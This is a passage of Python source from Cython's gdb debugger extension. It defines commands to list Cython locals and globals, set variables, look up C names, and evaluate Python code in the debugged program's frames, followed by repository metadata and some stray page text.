    """Case-insensitive sort key for (name, value) pairs (PEP 8: prefer
    def over assigning a lambda to a name)."""
    return item[0].lower()
class CyLocals(CythonCommand):
    """
    List the locals from the current Cython frame.
    """

    name = 'cy locals'
    command_class = gdb.COMMAND_STACK
    completer_class = gdb.COMPLETE_NONE

    @dispatch_on_frame(c_command='info locals', python_command='py-locals')
    def invoke(self, args, from_tty):
        cython_function = self.get_cython_function()
        # in the module init function the "locals" are really the globals
        if cython_function.is_initmodule_function:
            self.cy.globals.invoke(args, from_tty)
            return

        local_cython_vars = cython_function.locals
        # NOTE(review): max() raises ValueError when a function has no
        # locals at all — confirm whether that can happen here.
        max_name_length = len(max(local_cython_vars, key=len))
        for name, cyvar in sorted(local_cython_vars.items(), key=sortkey):
            if self.is_initialized(self.get_cython_function(), cyvar.name):
                value = gdb.parse_and_eval(cyvar.cname)
                if not value.is_optimized_out:
                    self.print_gdb_value(cyvar.name, value,
                                         max_name_length, '')
class CyGlobals(CyLocals):
    """
    List the globals from the current Cython module.
    """

    name = 'cy globals'
    command_class = gdb.COMMAND_STACK
    completer_class = gdb.COMPLETE_NONE

    @dispatch_on_frame(c_command='info variables', python_command='py-globals')
    def invoke(self, args, from_tty):
        global_python_dict = self.get_cython_globals_dict()
        module_globals = self.get_cython_function().module.globals

        # Width of the name column: length of the longest name from either
        # source of globals.
        max_globals_len = 0
        max_globals_dict_len = 0
        if module_globals:
            max_globals_len = len(max(module_globals, key=len))
        if global_python_dict:
            # BUG FIX: without key=len, max() returned the lexicographically
            # largest key, not the longest one, skewing the column width
            # (the module_globals branch above already used key=len).
            max_globals_dict_len = len(max(global_python_dict, key=len))

        max_name_length = max(max_globals_len, max_globals_dict_len)

        seen = set()
        print('Python globals:')
        for k, v in sorted(global_python_dict.items(), key=sortkey):
            v = v.get_truncated_repr(libpython.MAX_OUTPUT_LEN)
            seen.add(k)
            print(' %-*s = %s' % (max_name_length, k, v))

        print('C globals:')
        for name, cyvar in sorted(module_globals.items(), key=sortkey):
            if name not in seen:
                try:
                    value = gdb.parse_and_eval(cyvar.cname)
                except RuntimeError:
                    # symbol not present in this binary; skip silently
                    pass
                else:
                    if not value.is_optimized_out:
                        self.print_gdb_value(cyvar.name, value,
                                             max_name_length, ' ')
class EvaluateOrExecuteCodeMixin(object):
    """
    Evaluate or execute Python code in a Cython or Python frame. The 'evalcode'
    method evaluations Python code, prints a traceback if an exception went
    uncaught, and returns any return value as a gdb.Value (NULL on exception).
    """

    def _fill_locals_dict(self, executor, local_dict_pointer):
        "Fill a remotely allocated dict with values from the Cython C stack"
        cython_func = self.get_cython_function()

        for name, cyvar in cython_func.locals.items():
            # only initialized Python-object locals can go in the dict
            if cyvar.type == PythonObject and self.is_initialized(cython_func, name):
                try:
                    val = gdb.parse_and_eval(cyvar.cname)
                except RuntimeError:
                    continue
                else:
                    if val.is_optimized_out:
                        continue

                pystringp = executor.alloc_pystring(name)
                # C expression evaluated in the inferior to insert the entry
                code = '''
                    (PyObject *) PyDict_SetItem(
                        (PyObject *) %d,
                        (PyObject *) %d,
                        (PyObject *) %s)
                ''' % (local_dict_pointer, pystringp, cyvar.cname)

                try:
                    if gdb.parse_and_eval(code) < 0:
                        gdb.parse_and_eval('PyErr_Print()')
                        raise gdb.GdbError("Unable to execute Python code.")
                finally:
                    # PyDict_SetItem doesn't steal our reference
                    executor.xdecref(pystringp)

    def _find_first_cython_or_python_frame(self):
        # walk outward from the selected frame and select the first one
        # cygdb can evaluate code in
        frame = gdb.selected_frame()
        while frame:
            if (self.is_cython_function(frame) or
                self.is_python_function(frame)):
                frame.select()
                return frame

            frame = frame.older()

        raise gdb.GdbError("There is no Cython or Python frame on the stack.")

    def _evalcode_cython(self, executor, code, input_type):
        with libpython.FetchAndRestoreError():
            # get the dict of Cython globals and construct a dict in the
            # inferior with Cython locals
            global_dict = gdb.parse_and_eval(
                '(PyObject *) PyModule_GetDict(__pyx_m)')
            local_dict = gdb.parse_and_eval('(PyObject *) PyDict_New()')

            try:
                self._fill_locals_dict(executor,
                                       libpython.pointervalue(local_dict))
                result = executor.evalcode(code, input_type, global_dict,
                                           local_dict)
            finally:
                # drop the inferior-side locals dict created above
                executor.xdecref(libpython.pointervalue(local_dict))

        return result

    def evalcode(self, code, input_type):
        """
        Evaluate `code` in a Python or Cython stack frame using the given
        `input_type`.
        """
        frame = self._find_first_cython_or_python_frame()
        executor = libpython.PythonCodeExecutor()
        if self.is_python_function(frame):
            return libpython._evalcode_python(executor, code, input_type)
        return self._evalcode_cython(executor, code, input_type)
class CyExec(CythonCommand, libpython.PyExec, EvaluateOrExecuteCodeMixin):
    """
    Execute Python code in the nearest Python or Cython frame.
    """

    name = '-cy-exec'
    command_class = gdb.COMMAND_STACK
    completer_class = gdb.COMPLETE_NONE

    def invoke(self, expr, from_tty):
        # Normalize the user's source; statements are always run in
        # single-input mode regardless of the detected input type.
        expr, input_type = self.readcode(expr)
        code_runner = libpython.PythonCodeExecutor()
        # Execute in the inferior and release the returned reference.
        result = self.evalcode(expr, code_runner.Py_single_input)
        code_runner.xdecref(result)
class CySet(CythonCommand):
    """
    Set a Cython variable to a certain value

        cy set my_cython_c_variable = 10
        cy set my_cython_py_variable = $cy_eval("{'doner': 'kebab'}")

    This is equivalent to

        set $cy_value("my_cython_variable") = 10
    """

    name = 'cy set'
    command_class = gdb.COMMAND_DATA
    completer_class = gdb.COMPLETE_NONE

    @require_cython_frame
    def invoke(self, expr, from_tty):
        # Split on the first '=' only, so the value expression may itself
        # contain '=' characters.
        varname, sep, value_expr = expr.partition('=')
        if not sep:
            raise gdb.GdbError("Invalid expression. Use 'cy set var = expr'.")

        # Translate the Cython name to its mangled C name, then let gdb's
        # own 'set' command perform the assignment.
        cname = self.cy.cy_cname.invoke(varname.strip())
        gdb.execute("set %s = %s" % (cname, value_expr))
# Functions
class CyCName(gdb.Function, CythonBase):
    """
    Get the C name of a Cython variable in the current context.
    Examples:

        print $cy_cname("function")
        print $cy_cname("Class.method")
        print $cy_cname("module.function")
    """

    @require_cython_frame
    @gdb_function_value_to_unicode
    def invoke(self, cyname, frame=None):
        if frame is None:
            frame = gdb.selected_frame()

        cname = None
        if self.is_cython_function(frame):
            func = self.get_cython_function(frame)
            # Resolution order: locals, then module globals, then module
            # functions qualified with the module name.
            if cyname in func.locals:
                cname = func.locals[cyname].cname
            elif cyname in func.module.globals:
                cname = func.module.globals[cyname].cname
            else:
                qname = '%s.%s' % (func.module.name, cyname)
                entry = func.module.functions.get(qname)
                if entry is not None:
                    cname = entry.cname

        if not cname:
            # Fall back to the global registry of qualified function names.
            cname = self.cy.functions_by_qualified_name.get(cyname)

        if not cname:
            raise gdb.GdbError('No such Cython variable: %s' % cyname)

        return cname
class CyCValue(CyCName):
    """
    Get the value of a Cython variable.
    """

    @require_cython_frame
    @gdb_function_value_to_unicode
    def invoke(self, cyname, frame=None):
        module_globals = self.get_cython_globals_dict()
        func = self.get_cython_function(frame)

        if self.is_initialized(func, cyname):
            # Resolve the mangled C name via CyCName, then read its value.
            cname = super(CyCValue, self).invoke(cyname, frame=frame)
            return gdb.parse_and_eval(cname)

        if cyname in module_globals:
            return module_globals[cyname]._gdbval

        raise gdb.GdbError("Variable %s is not initialized." % cyname)
class CyLine(gdb.Function, CythonBase):
    """
    Get the current Cython line.
    """

    @require_cython_frame
    def invoke(self):
        # CythonBase maps the current C location back to its Cython line.
        current_line = self.get_cython_lineno()
        return current_line
class CyEval(gdb.Function, CythonBase, EvaluateOrExecuteCodeMixin):
    """
    Evaluate Python code in the nearest Python or Cython frame and return
    the result.
    """

    @gdb_function_value_to_unicode
    def invoke(self, python_expression):
        # Eval-mode input: the expression's value becomes the function's
        # result in gdb.
        return self.evalcode(python_expression,
                             libpython.PythonCodeExecutor.Py_eval_input)
# Module-level wiring: create the CythonInfo singleton, register every 'cy'
# subcommand with gdb, and connect the two so commands can reach the
# debug-info state.
cython_info = CythonInfo()
cy = CyCy.register()
cython_info.cy = cy
def register_defines():
    # Register user-level 'cy step' / 'cy next' aliases for the internal
    # 'cy -step' / '-next' commands by sourcing a small gdb script, and
    # attach the Python docstrings as their gdb help text.
    libpython.source_gdb_script(textwrap.dedent("""\
define cy step
cy -step
end
define cy next
cy -next
end
document cy step
%s
end
document cy next
%s
end
""") % (CyStep.__doc__, CyNext.__doc__))

register_defines()
| fabianrost84/cython | Cython/Debugger/libcython.py | Python | apache-2.0 | 44,948 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.